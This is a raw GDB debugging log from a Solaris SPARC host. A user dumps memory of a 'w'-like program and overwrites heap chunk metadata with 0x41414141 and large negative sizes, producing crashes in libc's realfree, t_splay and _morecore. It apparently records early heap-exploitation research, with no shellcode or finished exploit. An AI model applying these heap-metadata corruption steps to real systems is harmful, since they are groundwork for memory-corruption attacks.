0x348a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x348b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x348c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x348d0: 0x00000000 0x00000000 0x00000000 0x0000002f
0x348e0: 0x62617a7a 0x00000000 0x00000000 0x00000000
0x348f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34900: 0x732f3131 0x7074732f 0x31310000 0x00000000
0x34910: 0x00000000 0x00000000 0x00000000 0x00000000
0x34920: 0x00000000 0x00007527 0x00080000 0x00000000
0x34930: 0x544b6431 0x000def0a 0x00000000 0x00000000
0x34940: 0x00000000 0x00000000 0x00000000 0x00000000
0x34950: 0x00000000 0x00000000 0x00000000 0x00000000
0x34960: 0x00000000 0x00000000 0x00000000 0x00000000
0x34970: 0x00000000 0x00000000 0x00000000 0x00000000
0x34980: 0x00000000 0x00000000 0x00000000 0x00000000
0x34990: 0x00000000 0x00000000 0x00000000 0x00000000
0x349a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x349b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x349c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x349d0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x349e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x349f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a00: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a10: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a20: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a30: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a40: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a50: 0x00000000 0x6a6b7269 0x63680000 0x00000000
0x34a60: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a70: 0x00000000 0x732f3132 0x7074732f 0x31320000
0x34a80: 0x00000000 0x00000000 0x00000000 0x00000000
0x34a90: 0x00000000 0x00000000 0x0000083d 0x00080000
0x34aa0: 0x00000000 0x527021bc 0x0001e605 0x00000000
0x34ab0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ac0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ad0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ae0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34af0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b00: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b10: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b20: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b30: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b40: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x34b50: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b60: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b70: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b80: 0x00000000 0x00000000 0x00000000 0x00000000
0x34b90: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ba0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34bb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34bc0: 0x00000000 0x00000000 0x64656d69 0x6a61636b
0x34bd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34be0: 0x00000000 0x00000000 0x732f3133 0x7074732f
0x34bf0: 0x31330000 0x00000000 0x00000000 0x00000000
0x34c00: 0x00000000 0x00000000 0x00000000 0x000006b2
0x34c10: 0x00080000 0x00000000 0x52701251 0x00074603
0x34c20: 0x00000000 0x00000000 0x00000000 0x00000000
0x34c30: 0x00000000 0x00000000 0x00000000 0x00000000
0x34c40: 0x00000000 0x00000000 0x00000000 0x00000000
0x34c50: 0x00000000 0x00000000 0x00000000 0x00000000
0x34c60: 0x00000000 0x00000000 0x00000000 0x00000000
0x34c70: 0x00000000 0x00000000 0x00000000 0x00000000
0x34c80: 0x00000000 0x00000000 0x00000000 0x00000000
0x34c90: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ca0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34cb0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x34cc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34cd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ce0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34cf0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34d00: 0x00000000 0x00000000 0x00000000 0x00000000
0x34d10: 0x00000000 0x00000000 0x00000000 0x00000000
0x34d20: 0x00000000 0x00000000 0x00000000 0x00000000
0x34d30: 0x00000000 0x00000000 0x00000000 0x61676172
0x34d40: 0x61790000 0x00000000 0x00000000 0x00000000
0x34d50: 0x00000000 0x00000000 0x00000000 0x732f3134
0x34d60: 0x7074732f 0x31340000 0x00000000 0x00000000
0x34d70: 0x00000000 0x00000000 0x00000000 0x00000000
0x34d80: 0x00001603 0x00080000 0x00000000 0x52524378
0x34d90: 0x00032ffd 0x00000000 0x00000000 0x00000000
0x34da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34db0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34dc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34df0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e20: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x34e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e50: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x34e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ea0: 0x00000000 0x00000000 0x00000000 0x0000002f
0x34eb0: 0x6b657662 0x30303031 0x00000000 0x00000000
0x34ec0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ed0: 0x732f3135 0x7074732f 0x31350000 0x00000000
0x34ee0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ef0: 0x00000000 0x0000156f 0x00080000 0x00000000
0x34f00: 0x525241c4 0x00052c9f 0x00000000 0x00000000
0x34f10: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f20: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f30: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f40: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f50: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f60: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f70: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f80: 0x00000000 0x00000000 0x00000000 0x00000000
0x34f90: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x34fa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34fb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34fc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34fd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34fe0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34ff0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35000: 0x00000000 0x00000000 0x00000000 0x00000000
0x35010: 0x00000000 0x00000000 0x00000000 0x00000000
0x35020: 0x00000000 0x64687572 0x6c627574 0x00000000
0x35030: 0x00000918 0x00000000 0x00000000 0x00000000
0x35040: 0x00000000 0x00000000 0x00000000 0x00000000
0x35050: 0x00000000 0x00000000 0x00000000 0x00000000
0x35060: 0x00000000 0x00000000 0x00000000 0x00000000
0x35070: 0x00000000 0x00000000 0x00000000 0x00000000
0x35080: 0x00000000 0x00000000 0x00000000 0x00000000
0x35090: 0x00000000 0x00000000 0x00000000 0x00000000
0x350a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35100: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x35110: 0x00000000 0x00000000 0x00000000 0x00000000
0x35120: 0x00000000 0x00000000 0x00000000 0x00000000
0x35130: 0x00000000 0x00000000 0x00000000 0x00000000
0x35140: 0x00000000 0x00000000 0x00000000 0x00000000
0x35150: 0x00000000 0x00000000 0x00000000 0x00000000
0x35160: 0x00000000 0x00000000 0x00000000 0x00000000
0x35170: 0x00000000 0x00000000 0x00000000 0x00000000
0x35180: 0x00000000 0x00000000 0x00000000 0x00000000
0x35190: 0x00000000 0x00000000 0x00000000 0x00000000
0x351a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x351b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x351c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x351d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x351e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x351f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35200: 0x00000000 0x00000000 0x00000000 0x00000000
0x35210: 0x00000000 0x00000000 0x00000000 0x00000000
0x35220: 0x00000000 0x00000000 0x00000000 0x00000000
0x35230: 0x00000000 0x00000000 0x00000000 0x00000000
0x35240: 0x00000000 0x00000000 0x00000000 0x00000000
0x35250: 0x00000000 0x00000000 0x00000000 0x00000000
0x35260: 0x00000000 0x00000000 0x00000000 0x00000000
0x35270: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x35280: 0x00000000 0x00000000 0x00000000 0x00000000
0x35290: 0x00000000 0x00000000 0x00000000 0x00000000
0x352a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x352b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x352c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x352d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x352e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x352f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35300: 0x00000000 0x00000000 0x00000000 0x00000000
0x35310: 0x00000000 0x00000000 0x00000000 0x00000000
0x35320: 0x00000000 0x00000000 0x00000000 0x00000000
0x35330: 0x00000000 0x00000000 0x00000000 0x00000000
0x35340: 0x00000000 0x00000000 0x00000000 0x00000000
0x35350: 0x00000000 0x00000000 0x00000000 0x00000000
0x35360: 0x00000000 0x00000000 0x00000000 0x00000000
0x35370: 0x00000000 0x00000000 0x00000000 0x00000000
0x35380: 0x00000000 0x00000000 0x00000000 0x00000000
0x35390: 0x00000000 0x00000000 0x00000000 0x00000000
0x353a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x353b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x353c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x353d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x353e0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x353f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35400: 0x00000000 0x00000000 0x00000000 0x00000000
0x35410: 0x00000000 0x00000000 0x00000000 0x00000000
0x35420: 0x00000000 0x00000000 0x00000000 0x00000000
0x35430: 0x00000000 0x00000000 0x00000000 0x00000000
0x35440: 0x00000000 0x00000000 0x00000000 0x00000000
0x35450: 0x00000000 0x00000000 0x00000000 0x00000000
0x35460: 0x00000000 0x00000000 0x00000000 0x00000000
0x35470: 0x00000000 0x00000000 0x00000000 0x00000000
0x35480: 0x00000000 0x00000000 0x00000000 0x00000000
0x35490: 0x00000000 0x00000000 0x00000000 0x00000000
0x354a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x354b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x354c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x354d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x354e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x354f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35500: 0x00000000 0x00000000 0x00000000 0x00000000
0x35510: 0x00000000 0x00000000 0x00000000 0x00000000
0x35520: 0x00000000 0x00000000 0x00000000 0x00000000
0x35530: 0x00000000 0x00000000 0x00000000 0x00000000
0x35540: 0x00000000 0x00000000 0x00000000 0x00000000
0x35550: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x35560: 0x00000000 0x00000000 0x00000000 0x00000000
0x35570: 0x00000000 0x00000000 0x00000000 0x00000000
0x35580: 0x00000000 0x00000000 0x00000000 0x00000000
0x35590: 0x00000000 0x00000000 0x00000000 0x00000000
0x355a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x355b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x355c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x355d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x355e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x355f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35600: 0x00000000 0x00000000 0x00000000 0x00000000
0x35610: 0x00000000 0x00000000 0x00000000 0x00000000
0x35620: 0x00000000 0x00000000 0x00000000 0x00000000
0x35630: 0x00000000 0x00000000 0x00000000 0x00000000
0x35640: 0x00000000 0x00000000 0x00000000 0x00000000
0x35650: 0x00000000 0x00000000 0x00000000 0x00000000
0x35660: 0x00000000 0x00000000 0x00000000 0x00000000
0x35670: 0x00000000 0x00000000 0x00000000 0x00000000
0x35680: 0x00000000 0x00000000 0x00000000 0x00000000
0x35690: 0x00000000 0x00000000 0x00000000 0x00000000
0x356a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x356b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x356c0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x356d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x356e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x356f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35700: 0x00000000 0x00000000 0x00000000 0x00000000
0x35710: 0x00000000 0x00000000 0x00000000 0x00000000
0x35720: 0x00000000 0x00000000 0x00000000 0x00000000
0x35730: 0x00000000 0x00000000 0x00000000 0x00000000
0x35740: 0x00000000 0x00000000 0x00000000 0x00000000
0x35750: 0x00000000 0x00000000 0x00000000 0x00000000
0x35760: 0x00000000 0x00000000 0x00000000 0x00000000
0x35770: 0x00000000 0x00000000 0x00000000 0x00000000
0x35780: 0x00000000 0x00000000 0x00000000 0x00000000
0x35790: 0x00000000 0x00000000 0x00000000 0x00000000
0x357a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x357b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x357c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x357d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x357e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x357f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35800: 0x00000000 0x00000000 0x00000000 0x00000000
0x35810: 0x00000000 0x00000000 0x00000000 0x00000000
0x35820: 0x00000000 0x00000000 0x00000000 0x00000000
0x35830: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x35840: 0x00000000 0x00000000 0x00000000 0x00000000
0x35850: 0x00000000 0x00000000 0x00000000 0x00000000
0x35860: 0x00000000 0x00000000 0x00000000 0x00000000
0x35870: 0x00000000 0x00000000 0x00000000 0x00000000
0x35880: 0x00000000 0x00000000 0x00000000 0x00000000
0x35890: 0x00000000 0x00000000 0x00000000 0x00000000
0x358a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x358b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x358c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x358d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x358e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x358f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35900: 0x00000000 0x00000000 0x00000000 0x00000000
0x35910: 0x00000000 0x00000000 0x00000000 0x00000000
0x35920: 0x00000000 0x00000000 0x00000000 0x00000000
0x35930: 0x00000000 0x00000000 0x00000000 0x00000000
0x35940: 0x00000000 0x00000000 0x00035030 0x00000000
0x35950: 0x00000003 0x00000000 0x00000000 0x00000000
0x35960: 0x00000000 0x00000000 0x00000000 0x00000000
0x35970: 0x00000000 0x00000000 0x00000000 0x00000000
0x35980: 0x00000000 0x00000000 0x00000000 0x00000000
0x35990: 0x00000000 0x00000000 0x00000000 0x00000000
0x359a0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) set *0x35948=0x414141414141414141414141
Numeric constant too large.
(gdb) set *0x35948=0x41414141
(gdb) set *0x3594c=0x41414141
(gdb) set *0x35950=0x41414141
(gdb) set *0x35948=0x41414100
(gdb) set *0x35950=0x41414100
(gdb) set *0x3594c=0x41414100
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) del 2
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) c
Continuing.
Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) c
Continuing.
Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35948=0x41414100
(gdb) c
Continuing.
Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x3594c=0x41414100
(gdb) c
Continuing.
Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35948=0x41414100
(gdb) set *0x3594c=0x41414100
(gdb) c
Continuing.
Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35948=0x41414100
(gdb) set *0x3594c=0x41414100
(gdb) set *0x35950=0x41414100
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0x41414100
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c2514 in realfree () from /usr/lib/libc.so.1
#1 0xff2c2018 in _malloc_unlocked () from /usr/lib/libc.so.1
#2 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#3 0x00011cf0 in main ()
#4 0x000114e0 in main ()
(gdb) q
The program is running. Exit anyway? (y or n) y
bazz@blade72[pts/3][~] gdb w_32
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...(no debugging symbols found)...
/home/bazz/.gdb: No such file or directory.
(gdb) b *0x11114
Breakpoint 1 at 0x11114
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0x41414100
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) c
Continuing.
7:54pm up 595 day(s), 6:04, 4 users, load average: 0.02, 0.02, 0.02
User tty login@ idle JCPU PCPU what
bazz pts/1 5:10pm 42 /home/bazz/w_32
bazz pts/2 7:23pm 21 /home/bazz/w_32
bazz pts/3 7:34pm 3 /home/bazz/w_32
bazz pts/4 7:47pm 5 1 /home/bazz/tools/bin/bash
Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0x41414141
(gdb) c
Continuing.
7:55pm up 595 day(s), 6:04, 4 users, load average: 0.02, 0.02, 0.02
User tty login@ idle JCPU PCPU what
bazz pts/1 5:10pm 43 /home/bazz/w_32
bazz pts/2 7:23pm 21 /home/bazz/w_32
bazz pts/3 7:34pm 3 /home/bazz/w_32
bazz pts/4 7:47pm 5 1 /home/bazz/tools/bin/bash
Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0xFFFFFFF0
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c2a44 in t_splay () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c2a44 in t_splay () from /usr/lib/libc.so.1
#1 0xff2c28b0 in t_delete () from /usr/lib/libc.so.1
#2 0xff2c24b4 in realfree () from /usr/lib/libc.so.1
#3 0xff2c2018 in _malloc_unlocked () from /usr/lib/libc.so.1
#4 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#5 0xff2b624c in calloc () from /usr/lib/libc.so.1
#6 0xff2d4ce8 in _tzload () from /usr/lib/libc.so.1
#7 0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#8 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#9 0x00011e8c in main ()
#10 0x00011144 in main ()
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0xFFFFFFC8
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c27e4 in _morecore () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c27e4 in _morecore () from /usr/lib/libc.so.1
#1 0xff2c1fc4 in _malloc_unlocked () from /usr/lib/libc.so.1
#2 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#3 0xff2b624c in calloc () from /usr/lib/libc.so.1
#4 0xff2d4d30 in _tzload () from /usr/lib/libc.so.1
#5 0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#6 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#7 0x00011e8c in main ()
#8 0x00011144 in main ()
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0xFFFFF008
(gdb) c
Continuing.
7:58pm up 595 day(s), 6:08, 4 users, load average: 0.01, 0.02, 0.02
User tty login@ idle JCPU PCPU what
bazz pts/1 5:10pm 46 /home/bazz/w_32
bazz pts/2 7:23pm 25 /home/bazz/w_32
bazz pts/3 7:34pm 3 /home/bazz/w_32
bazz pts/4 7:47pm 9 1 /home/bazz/tools/bin/bash
Program exited normally.
(gdb) watch 0x35950
Watchpoint 2: 219472
(gdb) wp
Undefined command: "wp". Try "help".
(gdb) i w
Ambiguous info command "w": warranty, watchpoints.
(gdb) info wp
Undefined info command: "wp". Try "help info".
(gdb) info watchpoints
Num Type Disp Enb Address What
1 breakpoint keep y 0x00011114 <main+592>
breakpoint already hit 1 time
2 watchpoint keep y 219472
(gdb) r
Starting program: /home/bazz/w_32
^C
Program received signal SIGINT, Interrupt.
0xff3d8518 in ?? ()
(gdb) c
Continuing.
^C
Program received signal SIGINT, Interrupt.
0xff3ced00 in ?? ()
(gdb) c
Continuing.
(no debugging symbols found)...Watchpoint 2: 219472
(no debugging symbols found)...Watchpoint 2: 219472
(no debugging symbols found)...Watchpoint 2: 219472
^C
Program received signal SIGINT, Interrupt.
0xff2b375c in strncpy () from /usr/lib/libc.so.1
(gdb) del 2
(gdb) c
Continuing.
Breakpoint 1, 0x00011114 in main ()
(gdb) watch *0x35950
Hardware watchpoint 3: *219472
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2b624c in calloc () from /usr/lib/libc.so.1
#3 0xff2d4a4c in _tzload () from /usr/lib/libc.so.1
#4 0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#5 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6 0x00011e8c in main ()
#7 0x00011144 in main ()
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
8:01pm up 595 day(s), 6:10, 4 users, load average: 0.18, 0.16, 0.08
User tty login@ idle JCPU PCPU what
Hardware watchpoint 3: *219472
Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472
Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
bazz pts/1 5:10pm 50 /home/bazz/w_32
